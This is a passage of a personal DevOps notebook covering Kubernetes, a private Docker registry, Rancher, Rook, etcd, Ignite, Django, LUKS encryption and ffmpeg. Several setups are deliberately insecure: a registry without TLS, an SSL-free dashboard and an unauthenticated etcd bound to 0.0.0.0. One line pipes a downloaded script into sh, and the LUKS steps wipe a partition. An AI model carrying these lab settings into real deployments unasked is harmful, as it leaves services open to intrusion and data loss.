8080 targetPort: 8170 nodePort: 33333 protocol: TCP selector: component: test-service-app

The port is 8080 which represents that test-service can be accessed by other services in the cluster at port 8080. The targetPort is 8170 which represents the test-service is actually running on port 8170 on pods The nodePort is 33333 which represents that test-service can be accessed via kube-proxy on port 33333. https://stackoverflow.com/a/49982009 https://stackoverflow.com/a/41963878

14.11.10 Sample Project https://github.com/testdrivenio/flask-vue-kubernetes https://testdriven.io/blog/running-flask-on-kubernetes/ https://github.com/hnarayanan/kubernetes-django https://github.com/wildfish/kubernetes-django-starter/tree/master/k8s

14.11.11 Deploy a docker registry in the kubernetes cluster and configure Ingress with Let’s Encrypt https://github.com/kubernetes/ingress-nginx/tree/master/docs/examples/docker-registry

90 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

14.11.12 Deploy a docker registry without TLS is the kubernetes cluster

Define namespace, deployment, service and ingress in one file called docker-registry-deployment.yaml:

# # Local docker registry without TLS # kubectl create -f docker-registry.yaml # apiVersion: v1 kind: Namespace metadata: name: docker-registry --- apiVersion: extensions/v1beta1 kind: Deployment metadata: name: docker-registry labels: name: docker-registry namespace: docker-registry spec: replicas:1 template: metadata: labels: app: docker-registry spec: containers: - name: docker-registry image: registry:2 imagePullPolicy: Always ports: - containerPort: 5000 # @note: we enable delete image API env: - name: REGISTRY_STORAGE_DELETE_ENABLED value: "true" - name: REGISTRY_HTTP_ADDR value: ":5000" - name: REGISTRY_STORAGE_FILESYSTEM_ROOTDIRECTORY value: "/var/lib/registry" volumeMounts: - name: docker-registry-mount mountPath: "/var/lib/registry" volumes: - name: docker-registry-mount persistentVolumeClaim: claimName: docker-registry-pvc

--- kind: Service apiVersion: v1 metadata: name: docker-registry namespace: docker-registry (continues on next page)

14.11. kubernetes 91 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) spec: selector: app: docker-registry ports: - port: 5000 targetPort: 5000

--- apiVersion: extensions/v1beta1 kind: Ingress metadata: annotations: nginx.ingress.kubernetes.io/proxy-body-size: "0" nginx.ingress.kubernetes.io/proxy-read-timeout: "600" nginx.ingress.kubernetes.io/proxy-send-timeout: "600" name: docker-registry namespace: docker-registry spec: rules: - host: registry.me http: paths: - backend: serviceName: docker-registry servicePort: 5000 path: /

--- apiVersion: v1 kind: PersistentVolume metadata: name: docker-registry-pv labels: type: local namespace: docker-registry spec: capacity: storage: 20Gi storageClassName: standard accessModes: - ReadWriteOnce hostPath: path: "/data/docker-registry-pv"

--- apiVersion: v1 kind: PersistentVolumeClaim metadata: name: docker-registry-pvc labels: type: local (continues on next page)

92 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) namespace: docker-registry spec: accessModes: - ReadWriteOnce resources: requests: storage: 20Gi volumeName: docker-registry-pv storageClassName: standard

Deploy on kubernetes:

$ kubectl create -f docker-registry-deployment.yaml

14.11.13 Configure docker service to use local insecure registry

Add --insecure-registry registry.me:80 to docker.service file:

$ sudo vim /lib/systemd/system/docker.service

ExecStart=/usr/bin/dockerd --max-concurrent-downloads1 --insecure-registry

˓→registry.me:80 -H fd://

Or add to daemon.json file:

$ vim /etc/docker/daemon.json

{ "insecure-registries":["registry.me:80"] }

And then restart docker:

$ systemctl daemon-reload $ service docker restart

Add tag same as registry.me:80 registry name to one image and push it to local registry:

$ docker tag nginx:1.10.2 registry.me:80/nginx $ docker push registry.me:80/nginx

Now repo is available: http://registry.me/v2/nginx/tags/list List of images on local docker registry: http://registry.me/v2/_catalog Deploy a new nginx pod from registry.me:80/nginx local registry on kubernetes:

$ kubectl run nginx --image=registry.me:80/nginx

Note: You need to update DNS for registry.me on host and nodes. https://github.com/Juniper/contrail-docker/wiki/Configure-docker-service-to-use-insecure-registry

14.11. kubernetes 93 Omid Raha MyStack Documentation, Release 0.1

14.11.14 Delete images from a private local docker registry

$ curl --head -XGET -H "Accept: application/vnd.docker.distribution.manifest.v2+json"

˓→http://registry.me:80/v2/nginx/manifests/latest

HTTP/1.1 200OK Server: nginx/1.13.12 Date: Mon, 04 Mar 2019 08:51:01 GMT Content-Type: application/vnd.docker.distribution.manifest.v2+json Content-Length: 3237 Connection: keep-alive Docker-Content-Digest:

˓→sha256:6298d62cef5e82170501d4d9f9b3d7549b8c272fae787f1b93829edd472f894a Docker-Distribution-Api-Version: registry/2.0 Etag: "sha256:6298d62cef5e82170501d4d9f9b3d7549b8c272fae787f1b93829edd472f894a" X-Content-Type-Options: nosniff

$ curl -X DELETE -H "Accept: application/vnd.docker.distribution.manifest.v2+json"

˓→http://registry.me:80/v2/nginx/manifests/

˓→sha256:6298d62cef5e82170501d4d9f9b3d7549b8c272fae787f1b93829edd472f894a https://docs.docker.com/registry/spec/api/#/deleting-an-image By default delete is disable, and you will see this error:

{"errors":[{"code":"UNSUPPORTED","message":"The operation is unsupported."}]} to enable it you need to set REGISTRY_STORAGE_DELETE_ENABLED=true env. https://github.com/docker/distribution/issues/1573

14.11.15 Assigning Pods to Nodes

Attach label to the node:

$ kubectl get nodes ' NAME STATUS ROLES AGE VERSION ubuntu-190 Ready controlplane,etcd 33d v1.11.6 ubuntu-191 Ready worker 34m v1.11.6 ubuntu-192 Ready worker 38s v1.11.6 ubuntu-193 Ready worker 9s v1.11.6 ' # kubectl label nodes = $ kubectl label nodes ubuntu-191 workerType=Storage

Add a nodeSelector field to pod configuration: apiVersion: v1 kind: Pod metadata: name: postgres labels: env: test spec: (continues on next page)

94 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) containers: - name: postgres image: postgres imagePullPolicy: IfNotPresent nodeSelector: workerType=Storage https://kubernetes.io/docs/concepts/configuration/assign-pod-node/

14.12 Rancher

14.12.1 Install

Docker

Rancher 2.x:

$ docker run -d --restart=unless-stopped -p 80:80 -p 443:443 rancher/rancher https://github.com/rancher/rancher#quick-start

Minimum System

For install etcd and Control Plane on one node: Ram: 2GB CPU: 1 core

Vagrant

$ vagrant init ubuntu/xenial64 $ vim Vagrantfile # Set ping able Network from host config.vm.network "private_network", ip: "192.168.33.10 # Set More memory config.vm.provider "virtualbox" do |vb| vb.memory = "4096" end # vagrant reload $ vagrant up --provider virtualbox $ vagrant ssh $ apt-get update $ apt-get upgrade $ curl https://releases.rancher.com/install-docker/1.12.sh | sh $ sudo usermod -aG docker ubuntu

Now go to: http://192.168.10.119:1010/env/1a5/infra/hosts/add?driver=custom https://www.vagrantup.com/docs/virtualbox/configuration.html

14.12. Rancher 95 Omid Raha MyStack Documentation, Release 0.1

14.12.2 Setting Up a Rancher http://docs.rancher.com/rancher/v1.5/en/quick-start-guide/ https://github.com/infracloudio/rancher-vagrant-setup

14.12.3 Resiliency Planes

For production deployments, it is best practice that each plane runs on dedicated physical or virtual hosts. For devel- opment, multi-tenancy may be used to simplify management and reduce costs. Data Plane This plane is comprised of one or more etcd containers. Etcd is a distributed reliable key-value store which stores all Kubernetes state. This plane may be referred to as stateful, meaning the software comprising the plane maintains application state. Orchestration Plane This plane is comprised of stateless components that power our Kubernetes distribution. Compute Plane This plane is comprised of the Kubernetes pods. http://docs.rancher.com/rancher/v1.5/en/kubernetes/resiliency-planes/ http://docs.rancher.com/rancher/v1.5/en/kubernetes/resiliency-planes/#separated-planes http://docs.rancher.com/rancher/v1.5/en/kubernetes/resiliency-planes/#overlapping-planes

Host Requirements for Kubernetes

For overlapping planes setup: At least 1 CPU, 2GB RAM. Resource requirements vary depending on workload. For separated planes setup: A minimum of five hosts is required for this deployment type. Data Plane: Add 3 or more hosts with 1 CPU, >=1.5GB RAM, >=20GB DISK. When adding the host, label these hosts with etcd=true. Orchestration Plane: Add 1 or more hosts with >=1 CPU and >=2GB RAM. When adding the host, label these hosts with orchestration=true. You can get away with 1 host, but you sacrifice high availability. In the event of this host failing, some K8s features such as the API, rescheduling pods in the event of failure, etc. will not occur until a new host is provisioned. Compute Plane: Add 1 or more hosts. When adding the host, label these hosts with compute=true. http://docs.rancher.com/rancher/v1.5/en/kubernetes/#host-requirements-for-kubernetes My result: with etcd=true 222MB RAM with orchestration=true 400MB RAM with compute=true 400MB RAM

96 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

14.12.4 Backup Rancher server data

$ docker stop $ docker create --volumes-from --name rancher-

˓→data rancher/server $ docker export rancher-data > rancher-data.tar $ docker run -d --volumes-from rancher-data --restart=unless-stopped -p 80:8080

˓→rancher/server

$ docker cp :/var/lib/mysql https://docs.rancher.com/rancher/v1.5/en/upgrading/#single-container

14.12.5 Links http://rancher.com/kubernetes/ http://rancher.com/comparing-rancher-orchestration-engine-options/ https://orchestration.io/2016/06/30/deploying-kubernetes-with-rancher/ http://blog.kubernetes.io/2016/07/kubernetes-in-rancher-further-evolution.html http://rancher.com/cattle-swarm-kubernetes-side-side/ http://docs.rancher.com/rancher/v1.5/en/installing-rancher/installing-server/#single-container http://docs.rancher.com/rancher/v1.5/en/hosts/#supported-docker-versions https://github.com/rancher/rancher/wiki/Kubernetes-Management https://kubernetes.io/docs/user-guide/walkthrough/ http://cdn2.hubspot.net/hubfs/468859/Comparing%20Rancher%20Orchestration%20Engine%20Options.pdf https://cdn2.hubspot.net/hubfs/468859/Deploying%20and%20Scaling%20Kubernetes%20with%20Rancher%20-% 202nd%20ed.pdf

14.13 Rook

14.13.1 Deploy CephFS on kubernetes with rook

$ mkdir rook $ cd rook $ wget https://raw.githubusercontent.com/rook/rook/master/cluster/examples/kubernetes/

˓→ceph/operator.yaml $ wget https://raw.githubusercontent.com/rook/rook/master/cluster/examples/kubernetes/

˓→ceph/cluster.yaml

To disable TLS, edit cluster.yaml file: dashboard: enabled: true # serve the dashboard under a subpath (useful when you are accessing the dashboard

˓→via a reverse proxy) # urlPrefix: /ceph-dashboard (continues on next page)

14.13. Rook 97 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) # serve the dashboard at the given port. # port: 8443 # serve the dashboard using SSL ssl: false

Ingress file, ingress.yaml: apiVersion: extensions/v1beta1 kind: Ingress metadata: name: rook-ceph-mgr-dashboard namespace: rook-ceph annotations: kubernetes.io/ingress.class:"nginx" rules: - host: rook-ceph.example.com http: paths: - path:/ backend: serviceName: rook-ceph-mgr-dashboard servicePort: 8443

$ kubectl create -f operator.yaml $ kubectl create -f cluster.yaml $ kubectl create -f ingress.yaml

$ kubectl -n rook-ceph get pod ' NAME READY STATUS RESTARTS AGE rook-ceph-mgr-a-ffc44857d-xgh4d 1/1 Running 0 50m rook-ceph-mon-a-86f5fc4bc-clmfb 1/1 Running 0 51m rook-ceph-mon-b-7955f84c5c-sqhvj 1/1 Running 0 51m rook-ceph-mon-c-684556d465-sfmvv 1/1 Running 0 51m rook-ceph-osd-0-65968b6d86-wkdxt 1/1 Running 0 50m rook-ceph-osd-prepare-ubuntu-191-h6g2x 0/2 Completed 0 50m ' $ kubectl -n rook-ceph get service ' NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE rook-ceph-mgr ClusterIP 10.43.148.58 9283/TCP 50m rook-ceph-mgr-dashboard ClusterIP 10.43.89.64 8443/TCP 50m rook-ceph-mon-a ClusterIP 10.43.117.36 6789/TCP 51m rook-ceph-mon-b ClusterIP 10.43.164.245 6789/TCP 51m rook-ceph-mon-c ClusterIP 10.43.205.134 6789/TCP 51m ' $ kubectl -n rook-ceph-system get pod

' NAME READY STATUS RESTARTS AGE rook-ceph-agent-w6lsz 1/1 Running 0 1h rook-ceph-operator-5496d44d7c-wnm7h 1/1 Running 0 1h rook-discover-b4v7g ' $ kubectl -n rook-ceph get ingress ' NAME HOSTS ADDRESS PORTS AGE (continues on next page)

98 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) rook-ceph-mgr-dashboard rook-ceph.example.com 192.168.0.191 80 13m '

Now browse: http://rook-ceph.example.com/#/dashboard Username is admin and password is:

$ kubectl -n rook-ceph get secret rook-ceph-dashboard-password -o jsonpath="{['data

˓→']['password']}" | base64 --decode&& echo https://github.com/rook/rook/issues/2433

14.14 Etcd

In order to expose the etcd API to clients outside of the Docker host you’ll need use the host IP address when config- uring etcd.

$ export HostIP="192.168.1.40"

$ docker pull gcr.io/etcd-development/etcd:v3.3.4 $ rm -rf /tmp/etcd-data.tmp&& mkdir -p /tmp/etcd-data.tmp \ docker rmi gcr.io/etcd-development/etcd:v3.3.4 || true&& \ docker run \ -p 2379:2379 \ -p 2380:2380 \ --mount type=bind,source=/tmp/etcd-data.tmp,destination=/etcd-data \ --name etcd-gcr-v3.3.4 \ gcr.io/etcd-development/etcd:v3.3.4 \ /usr/local/bin/etcd \ --name s1 \ --data-dir /etcd-data \ --listen-client-urls http://0.0.0.0:2379 \ --advertise-client-urls http://0.0.0.0:2379 \ --listen-peer-urls http://0.0.0.0:2380 \ --initial-advertise-peer-urls http://0.0.0.0:2380 \ --initial-cluster s1=http://0.0.0.0:2380 \ --initial-cluster-token tkn \ --initial-cluster-state new

$ docker exec etcd-gcr-v3.3.4 /bin/sh -c "/usr/local/bin/etcd --version" $ docker exec etcd-gcr-v3.3.4 /bin/sh -c "ETCDCTL_API=3 /usr/local/bin/etcdctl version

˓→" $ docker exec etcd-gcr-v3.3.4 /bin/sh -c "ETCDCTL_API=3 /usr/local/bin/etcdctl

˓→endpoint health" $ docker exec etcd-gcr-v3.3.4 /bin/sh -c "ETCDCTL_API=3 /usr/local/bin/etcdctl put

˓→foo bar" $ docker exec etcd-gcr-v3.3.4 /bin/sh -c "ETCDCTL_API=3 /usr/local/bin/etcdctl get foo

˓→" https://github.com/coreos/etcd/releases https://coreos.com/etcd/docs/latest/v2/docker_guide.html

14.14. Etcd 99 Omid Raha MyStack Documentation, Release 0.1

14.15 Patroni

$ pip install patroni

$ git clone https://github.com/zalando/patroni $ cd patroni $ pip install -r requirements.txt

$ patronictl show-config $ patronictl edit-config pg_ctl, postgres, pg_basebackup and pg_rewind must be accessible within $PATH or you should put bin_dir into postgresql section. postgresql: bin_dir: /usr/lib/postgresql/9.6

14.16 Ignite

14.16.1 Run ignite as docker

$ docker pull apacheignite/ignite $ docker run -it --net=host -e "CONFIG_URI=https://raw.githubusercontent.com/apache/

˓→ignite/master/examples/config/example-cache.xml" apacheignite/ignite

$ pip install pylibmc

14.16.2 Connect to ignite as memcache with python import pylibmc client= pylibmc.Client (["127.0.0.1:11211"], binary=True) client.set("key",2 **60) client.set("key",b'You need to send message as binary') print("Value for'key': %s"%client.get("key"))

There is an error when try to set string value for keys instead of binary. client.set("key",'string message')

Traceback(most recent call last): File "", line1, in _pylibmc.ConnectionError: error3 from memcached_set:(0x21104c0) CONNECTION FAILURE,

˓→::rec() returned zero, server has disconnected, host: 127.0.0.1:11211 ->

˓→libmemcached/io.cc:484 https://apacheignite.readme.io/docs/memcached-support#section-python

14.16.3 Enable HTTP rest API

100 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

$ docker run --name ignite --net=host -e "CONFIG_URI=https://raw.githubusercontent.

˓→com/apache/ignite/master/examples/config/example-cache.xml" apacheignite/ignite https://apacheignite.readme.io/docs/docker-deployment TO enable HTTP connectivity, make sure that ignite-rest-http module is in the classpath of your application. With Ignite binary distribution, this means copying ignite-rest-http module from IGNITE_HOMElibsoptionalto IG- NITE_HOMElibs folder. https://apacheignite.readme.io/docs/rest-api#section-getting-started

$ docker exec -it ignite bash bash-4.4# cp -r apache-ignite-fabric/libs/optional/ignite-rest-http/ apache-ignite-

˓→fabric/libs/

$ docker stop ignite $ docker start ignite

$ curl http://localhost:8080/ignite?cmd=version $ curl "http://localhost:8080/ignite?cmd=getorcreate&cacheName=default"

14.16.4 Ignite Configuration

Persistence https://ignite.apache.org/arch/persistence.html https://apacheignite.readme.io/docs/distributed-persistent-store

Memory https://apacheignite.readme.io/docs/memory-configuration https://apacheignite.readme.io/docs/cache-modes http://apache-ignite-users.70518.x6.nabble.com/Best-practise-for-setting-Ignite-Active-to-true-when-using-persistence-layer-in-Ignite-2-1-td15839. html

Evictions https://apacheignite.readme.io/docs/evictions

Cluster is inactive

$ ./apache-ignite-fabric/bin/control.sh --activate

“”” [12:57:49,510][SEVERE][rest-#54][GridCacheCommandHandler] Failed to execute cache command: GridRest- CacheRequest [cacheName=default, cacheFlags=0, ttl=null, super=GridRestRequest [destId=null, clientId=null, addr=/127.0.0.1:44546, cmd=GET_OR_CREATE_CACHE]] class org.apache.ignite.IgniteException: Can not per- form the operation because the cluster is inactive. Note, that the cluster is considered inactive by default if Ignite Persistent Store is used to let all the nodes join the cluster. To activate the cluster call Ignite.active(true). “”“

14.16. Ignite 101 Omid Raha MyStack Documentation, Release 0.1

14.16.5 Sample Ingnite configuration file

127.0.0.1:47500..47509

102 Chapter 14. Deploy Omid Raha MyStack Documentation, Release 0.1

14.17 Function as a service (FaaS)

14.17.1 faas https://github.com/openfaas/faas

14.17.2 kubeless https://github.com/kubeless/kubeless

14.17.3 fission https://github.com/fission/fission

14.17. Function as a service (FaaS) 103 Omid Raha MyStack Documentation, Release 0.1

104 Chapter 14. Deploy CHAPTER 15

Dictionary

Contents:

15.1 Words warehouse sluggish audit coarse datum ideal span equality analogous misnomer Empirical resembles cowardly incognito penalty negligible exhausts Horrible

105 Omid Raha MyStack Documentation, Release 0.1 inventory qty probability belt disaster concern flavors sophistical compel deployment expedite versatile facilitates Replication inadvertently Convenient overwhelmingly allotted incredibly merely neutral observer arbiter empirical lapse heartbeat excerpt rely rationale exceptional Concluding dedicate rough spots unproductive colleagues’ lapses

106 Chapter 15. Dictionary Omid Raha MyStack Documentation, Release 0.1 shrine beaten differ fragments Jelly bean Key Lime Pie Gingerbread struck through chop rice chopsticks literally dislocated fists of fury feint talent drip hire reassuring despite defacement bartending tension sculpt bust dork fury stunt beat ingredients crew attitude palindrome jab prone cartridge

15.1. Words 107 Omid Raha MyStack Documentation, Release 0.1 revise spotted loyalty opening ceremony Defense burst tamil immigrant cheater

15.2 Terminology redundancy durability Consistency vertical scaling or scaling up horizontally, or scaling out (MongoDB scales horizontally by partitioning data in a processes known as sharding.) accumulating granular fault tolerance compound indexes (As a general rule, a query where one term demands an exact match and another specifies a range requires a compound index where the range key comes second.) pages (4 KB chunks called pages) In MongoDB’s B-tree implementation, a new node is allocated 8,192 bytes(8KB) The maximum key size in MongoDB v2.0 is 1024 bytes page fault thrashing ubiquitous btree (http://www.cl.cam.ac.uk/~smh22/docs/ubiquitous_btree.pdf) sparse != dense covering indexes = index-only queries concern high cardinality Replication network latency arbiter ACID (Atomicity, Consistency, Isolation, Durability)

108 Chapter 15. Dictionary Omid Raha MyStack Documentation, Release 0.1

15.3 Abbreviation

EAP Early Access Program

15.3. Abbreviation 109 Omid Raha MyStack Documentation, Release 0.1

110 Chapter 15. Dictionary CHAPTER 16

Django

Contents:

16.1 Tips

16.1.1 Create new project django-admin startproject mysite python manage.py startapp polls

16.1.2 Using django in python cmd from django.conf import settings django.setup() # or settings.configure()

16.1.3 Migration

$ python manage.py makemigrations $ python manage.py migrate $ python manage.py syncdb

16.1.4 Django dump data of django.contrib.auth.Group

Note: deprecated from Django 1.7 !

$ python manage.py dumpdata --format=json auth.Group > fixtures.json

111 Omid Raha MyStack Documentation, Release 0.1

16.1.5 Django migration for auth

$ python manage.py makemigrations account $ python manage.py makemigrations --empty account

Now adding your code to load initial data in RunPython section:

#-*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations def forwards_func(apps, schema_editor): Group= apps.get_model("auth","Group") db_alias= schema_editor.connection.alias Group.objects.using(db_alias).bulk_create([ Group(name='Viewer') Group(name='Editor'), Group(name='Admin'), ]) class Migration(migrations.Migration): dependencies=[ ('account','0001_initial') ]

operations=[ migrations.RunPython( forwards_func, ), ]

Then:

$ python manage.py syncdb

The '__first__' and '__latest__' can use in dependencies section. https://code.djangoproject.com/ticket/23422 https://docs.djangoproject.com/en/1.7/topics/migrations/#dependencies https://docs.djangoproject.com/en/1.7/ref/migration-operations/ https://docs.djangoproject.com/en/dev/ref/django-admin/#loaddata-fixture-fixture

16.1.6 how to reset django admin password?

$ manage.py changepassword

16.1.7 Run server from Python script

112 Chapter 16. Django Omid Raha MyStack Documentation, Release 0.1

#!/usr/bin/env python import os from django.core.management import call_command from django.core.wsgi import get_wsgi_application os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings") application= get_wsgi_application() call_command('runserver', '127.0.0.1:8000')

16.1.8 Static files handling

$ vim settings.py

# static files configs STATIC_ROOT= os.path.join(BASE_DIR, 'collected_static') STATIC_URL= '/st/' STATICFILES_DIRS=( os.path.join(BASE_DIR, 'static'), ) STATICFILES_FINDERS=( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', )

INSTALLED_APPS=( 'django.contrib.staticfiles', )

16.1.9 Get the static files URL in view from django.contrib.staticfiles.templatetags.staticfiles import static url= static('x.jpg') # url now contains '/static/x.jpg', assuming a static path of '/static/ https://docs.djangoproject.com/en/1.8/hkowto/static-files/ https://docs.djangoproject.com/en/1.8/ref/contrib/staticfiles/ http://stackoverflow.com/questions/11721818/django-get-the-static-files-url-in-view

16.1.10 Testing email sending from django.core import mail settings.EMAIL_USE_TLS= False settings.EMAIL_PORT= 25 settings.EMAIL_HOST='mail.example.com' settings.EMAIL_HOST_USER='[email protected]' settings.EMAIL_HOST_PASSWORD='' mail.send_mail('Subject','Body','[email protected]',['[email protected]'], fail_

˓→silently=False)

16.1. Tips 113 Omid Raha MyStack Documentation, Release 0.1

16.1.11 Django rest

Documenting your API http://www.django-rest-framework.org/topics/documenting-your-api/ https://github.com/ekonstantinidis/django-rest-framework-docs https://github.com/marcgibbons/django-rest-swagger

16.1.12 Django supported versions https://www.djangoproject.com/download/#supported-versions

16.1.13 Translation

$ django-admin makemessages -a $ django-admin compilemessages from django.utils.translation import ugettext from django.utils import translation translation.activate('fa') txt='Hello' ugettext(txt) ''

16.1.14 Django User Group Object Permissions

Add permission to user from django.contrib.auth.models import User from django.contrib.auth.models import Permission usr= User.objects.first() perm= Permission.objects.get(name='Can edit org') usr.user_permissions.add(perm)

Add user to group from django.contrib.auth.models import User from django.contrib.auth.models import Group usr= User.objects.first() grp= Group.objects.get(name='Operator') grp.user_set.add(usr)

Add group to user from django.contrib.auth.models import User from django.contrib.auth.models import Group usr= User.objects.first() grp= Group.objects.get(name='Operator') usr.groups.add(grp)

Add permission to group

114 Chapter 16. Django Omid Raha MyStack Documentation, Release 0.1

from django.contrib.auth.models import Group from django.contrib.auth.models import Permission perm= Permission.objects.get(name='can edit org') grp= Group.objects.get(name='Operator') grp.permissions.add(perm)

Create permission for an object from django.contrib.auth.models import Group from django.contrib.auth.models import Permission from django.contrib.contenttypes.models import ContentType from sample.models import SampleObj ct= ContentType.objects.get_for_model(SampleObj) perm= Permission.objects.create(codename='can edit org', name='Can Edit Org',

˓→content_type=ct)

Add a permission to a user/group during a django migration from django.contrib.auth.management import create_permissions from django.db import migrations def create_default_groups_and_permissions(apps, schema_editor): for app_config in apps.get_app_configs(): app_config.models_module= True create_permissions(app_config, verbosity=0) app_config.models_module= None

# Now add your perms to group here class Migration(migrations.Migration): dependencies=[ ('contenttypes','0002_remove_content_type_name'), ]

operations=[ migrations.RunPython(create_default_groups_and_permissions) ]

Django rest DjangoModelPermissions • GET requests require the user to have the view permission on the model. • POST requests require the user to have the add permission on the model. • PUT and PATCH requests require the user to have the change permission on the model. • DELETE requests require the user to have the delete permission on the model. https://www.django-rest-framework.org/api-guide/permissions/#djangomodelpermissions

16.2 Modules

16.2.1 Model Fields https://github.com/gintas/django-picklefield

16.2. Modules 115 Omid Raha MyStack Documentation, Release 0.1 https://github.com/bradjasper/django-jsonfield

116 Chapter 16. Django CHAPTER 17

Encryption

Contents:

17.1 Crypt setup

Setup cryptographic volumes for dm-crypt (including LUKS extension)

17.2 Encrypt home directory with cryptsetup module

1. Backup home directory 2. Install modules:

$ apt-get install cryptsetup

3. Install header files (if you got warn about headers files in previous step)

$ apt-get install firmware-linux firmware-realtek intel-microcode

4. Unmount partitions

$ umount -a

5. Load modules in kernel

$ modprobe xts $ modprobe dm-crypt $ modprobe aes $ modprobe aes-in $ modprobe aesni-intel $ modprobe aes-x86_64

117 Omid Raha MyStack Documentation, Release 0.1

6. Encrypt wanted partition

$ cryptsetup luksFormat -h --debug --cipher aes-xts-plain64 --hash sha256 /dev/sda5 another option for cipher is aes-cbc-essive:sha512 7. restart to effect new UUID 8. Open encrypted partition

$ cryptsetup luksOpen /dev/sda5 home

9. Format partition with wanted partition type

$ mkfs. /dev/mapper/home

10. Adding this partition to fstab file, also comment old line for home partition

$ vim /etc/fstab /dev/mapper/home /home ext4 defaults02

11. Get UUID of encryption partition

$ blkid

12. Adding UUID of encryption partition to etc/crypttab file

$ vim /etc/crypttab home UUID= none luks

13. Mount encryption partition

$ mount /dev/mapper/home

14. Copy home directory from backup to this encryption partition

$ mkdir /home/or $ cp -R /backup/or /home $ chown -R or /home/or

15. Update image file of boot

$ update-initramfs -u

16. Check status of encrypted partition

$ cryptsetup luksDump /dev/sda5

17. Backup headers of encryption partition

$ cryptsetup luksHeaderBackup /dev/sda5 --header-backup-file /backup/sha5_ency_header.

˓→img

Resources: Encrypt your linux home folder 2 ways and 10 steps

118 Chapter 17. Encryption Omid Raha MyStack Documentation, Release 0.1

17.3 TrueCrypt https://www.grc.com/misc/truecrypt/truecrypt.htm

17.3. TrueCrypt 119 Omid Raha MyStack Documentation, Release 0.1

120 Chapter 17. Encryption CHAPTER 18

ffmpeg

Contents:

18.1 tips

18.1.1 Cmds

$ ffmpeg -formats # print the list of supported file formats $ ffmpeg -codecs # print the list of supported codecs (E=encode,D=decode)

$ ffmpeg --help -i set the input file. Multiple -i switchs can be used -f set video format( for the input if before of -i, for output otherwise) -an ignore audio -vn ignore video -ar set audio rate(in Hz) -ac set the number of channels -ab set audio bitrate -acodec choose audio codec or use “copy” to bypass audio encoding -vcodec choose video codec or use “copy” to bypass video encoding -r video fps. You can also use fractional values like 30000/1001 instead of

˓→29.97 -s frame size(w x h, ie: 320x240) -aspect set the aspect ratio i.e:4:3 or 16:9 -sameq ffmpeg tries to keep the visual quality of the input -t N encode only N seconds of video(you can use also the hh:mm:ss.ddd format) -croptop, -cropleft, -cropright, -cropbottom crop input video frame on each side -y automatic overwrite of the output file -ss select the starting time in the source file -vol change the volume of the audio -g Gop size(distance between keyframes) -b Video bitrate (continues on next page)

121 Omid Raha MyStack Documentation, Release 0.1

(continued from previous page) -bt Video bitrate tolerance -metadata add a key=value metadata

18.1.2 Compile

Compile FFMPEG Requirement libraries:

$ aptitude install libfdk-aac-dev \ libmp3lame-dev \ libtheora-dev \ libvorbis-dev \ -dev \ libx264-dev

Also you can download libfdk_aac from http://sourceforge.net/projects/opencore-amr/? source=dlp and compile it:

$ ./configure $ make $ make install then download ffpmeg from http://www.ffmpeg.org/download.html#releases

$./configure --enable-gpl --enable-nonfree \ --enable-libmp3lame \ --enable-libfdk_aac \ --enable-libvorbis \ --enable-libtheora \ --enable-libx264 \ --enable-libvpx $ make $ make install

FFmpeg Static Builds

http://johnvansickle.com/ffmpeg/ http://ffmpeg.gusari.org/static/

18.1.3 Links https://sonnati.wordpress.com/2011/07/11/ffmpeg-the-swiss-army-knife-of-internet-streaming-part-i/

FFmpeg on Windows http://ffmpeg.zeranoe.com/

122 Chapter 18. ffmpeg Omid Raha MyStack Documentation, Release 0.1

18.1.4 How to Watermark an image into the video

# Top left $ ffmpeg -i source.avi -vf "movie=watermark.png [watermark]; [in][watermark]

˓→overlay=10:10 [out]" output.flv

# Top right $ ffmpeg -i source.avi -vf "movie=watermark.png [watermark]; [in][watermark]

˓→overlay=main_w-overlay_w-10:10 [out]" output.flv

# Bottom left $ ffmpeg -i source.avi -vf "movie=watermark.png [watermark]; [in][watermark]

˓→overlay=10:main_h-overlay_h-10 [out]" output.flv

# Bottom right $ ffmpeg -i source.avi -vf "movie=watermark.png [watermark]; [in][watermark]

˓→overlay=main_w-overlay_w-10:main_h-overlay_h-10 [out]" output.flv

# Center $ ffmpeg -i source.avi -vf "movie=watermark.png [watermark]; [in][watermark]

˓→overlay=main_w/2-overlay_w/2:main_h/2-overlay_h/2 [out]" output.flv http://www.digitalwhores.net/ffmpeg/ffmpeg-watermark-positions/

Burn subtitles into video

$ ffmpeg -i video.avi -vf subtitles=subtitle.srt out.avi https://trac.ffmpeg.org/wiki/HowToBurnSubtitlesIntoVideo

Reduce the size of a video

$ ffmpeg -i input.mp4 -r 30 -s 960x540 output.mp4

GUI Video editor

$ apt-get install kdenlive

Convert an animated gif to an mp4 file

$ ffmpeg -i input.gif -movflags faststart -pix_fmt yuv420p -vf "scale=trunc(iw/ ˓→2)*2:trunc(ih/2)*2" output.mp4

• movflags – This option optimizes the structure of the MP4 file so the browser can load it as quickly as possible. • pix_fmt – MP4 videos store pixels in different formats. We include this option to specify a specific format which has maximum compatibility across all browsers. • vf – MP4 videos using H.264 need to have a dimensions that are divisible by 2. This option ensures that’s the case.

18.1. tips 123 Omid Raha MyStack Documentation, Release 0.1

$ ffmpeg -f gif -i input.gif output.mp4 https://unix.stackexchange.com/a/294892

Extract screen shot for a video at a given time

$ ffmpeg -ss 00:00:03 -i input.mp4 -vframes1 -q:v2 output.jpg https://stackoverflow.com/a/27573049

124 Chapter 18. ffmpeg CHAPTER 19

Game

Contents:

19.1 Game

19.1.1 bzflag

$ sudo apt-get install bzflag $ bzfs -i 192.168.1.40 -p 5000 +f good $ bzfs -i 192.168.1.40 -p 5000 +f good -cr -j -ms5 +r https://wiki.bzflag.org/BZFS_Command_Line_Options https://wiki.bzflag.org/Sample_conf https://wiki.bzflag.org/Creating_a_server

125 Omid Raha MyStack Documentation, Release 0.1

126 Chapter 19. Game CHAPTER 20

